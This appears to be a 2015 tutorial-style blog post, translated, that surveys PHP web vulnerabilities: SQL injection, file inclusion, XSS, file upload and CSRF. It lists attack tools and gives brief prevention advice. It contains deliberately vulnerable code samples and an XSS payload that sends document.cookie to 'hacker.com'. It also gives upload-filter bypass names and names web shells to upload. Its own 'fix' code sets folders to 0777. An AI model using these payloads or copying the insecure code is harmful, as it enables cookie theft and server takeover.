Summary Web Security 2015 on tutscode

PHP TECHNOLOGY JAVASCRIPT HTML

Posted on 2015-04-08 12:43:00


- The sucurity holes & attacks

- Tools - Prevention

SQL Injection

$sql = "Select * from users where user_id = '" .$_GET['id']. "'";
8-) : mysql knowledge, [sqlmap]

File Inclution

$file = $_GET['page']; //The page we wish to display
 
$content = file_get_contents($file);
$content = nl2br($content);
echo $content;
8-) : linux knowledge

Cross-site scripting (XSS)

- XSS reflected - XSS stored
<script>alert(1)</script>

window.location='http://hacker.com/?cookie='+document.cookie
8-) : web knowledge, [FireBug]

File Upload

if (isset($_POST['Upload'])) 
{ 
            /* Some recommend validation here { */ 
            /* Some recommend validation here } */ 
 
            $target_path = "uploads/"; 
            $target_path = $target_path . basename( $_FILES['uploaded']['name']); 
 
            if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) 
            { 
 
                echo '<pre>'; 
                echo 'Your image was not uploaded.'; 
                echo '</pre>'; 
 
              } else { 
 
                echo '<pre>'; 
                echo $target_path . ' succesfully uploaded!'; 
                echo '</pre>'; 
 
            } 
 
        }
Bypass validation 
- Ext Blacklist validation ⇒ pHp | php4 | php5 | xhtml 
- Ext Write List validation ⇒ shell.jpg.php | shell.jpg.PhP | shell.php;.jpg | shell.php%0delete0.jpg
- Check type ⇒ [Firefox Live HTTP Header] 
- Check mime type ⇒ (Not sure) What to upload: r57.php | c99.php
  8-) : [Live HTTP Headers] , [Burp Suite]

Cross-Site Request Forgery (CSRF)

8-) : web session, cookie, form post knowledge

Other

- Public admin login page
- Public Tiny MCE File Manager 
- Crawling by Google bot & other 
- robots.txt 
- Directory Listing- chmod 777 -R 
  8-) : General knowledge 
  8-) : [Hydra] , [Burp Suite], Time Demo Brute Force Attack : (localhost)

Tools

Tool URL Description
John the Ripper http://www.openwall.com/john/ Crack password
THC-Hydra https://www.thc.org/thc-hydra/ Brute Force
sqlmap http://sqlmap.org/ Check SQL Injection
Burp Suite http://portswigger.net/burp/  
Nmap http://nmap.org/ Check open port
MD5 Decrypt http://www.md5online.org/  
ModSecurity https://www.modsecurity.org/ Web Application Firewall
Different tool: 
 * Firefox add-on - HTTP Fox : check http request - Live HTTP Headers : modify header request - FireBug : Edit cookie … - User Agent Switcher : Change agent of browser
 * PHP Shell - r57.php - c99.php

Prevention

SQL Injection
- Default cakephp support
 - Note: processing in function updateAll()
 - Install  [Mod Security] 
Cross-site scripting
- htmlentities for output 
File Upload
- Check file extension 
Cross-Site Request Forgery 
- Reduced times Session Timeout 
- Change method to POST for insert data and update data 
- Open Security component of CakePHP Different
Crawling by Google bot 
- Dùng robots.txt block folder 
  Directory Listing 
- Add Options -Indexes | Options 
-ExecCGI to file .htaccess 
- chmod resonable folders, Do not 777 -R 
Public Tiny MCE File Manager 
- Handle each folder hierarchy for each Session login user
/* ---------- Split directory for each user login { ---------- */
if(!isset($_SESSION['UserInfo']['id']))
{
    header('Location: /404.php');
}
else
{
    // Create user upload directory
    $userID = $_SESSION['UserInfo']['id'];
    $userDir = $current_path.$userID;
    if(!is_dir($dirPath))
    {
        mkdir($userDir, 0777);
        chmod($userDir, 0777);
    }
 
    $userThumb = $thumbs_base_path.$userID;
    if(!is_dir($userThumb))
    {
        mkdir($userThumb, 0777);
        chmod($userThumb, 0777);
    }
 
    // Reset the path
    $upload_dir .= $userID.'/';
    $current_path .= $userID.'/';
    $thumbs_base_path .= $userID.'/';
}
/* ---------- Split directory for each user login } ---------- */
Should
- Add captcha for form register account 
- Hidden admin page link
  
 Author: DuyNB
 Translator: Hainq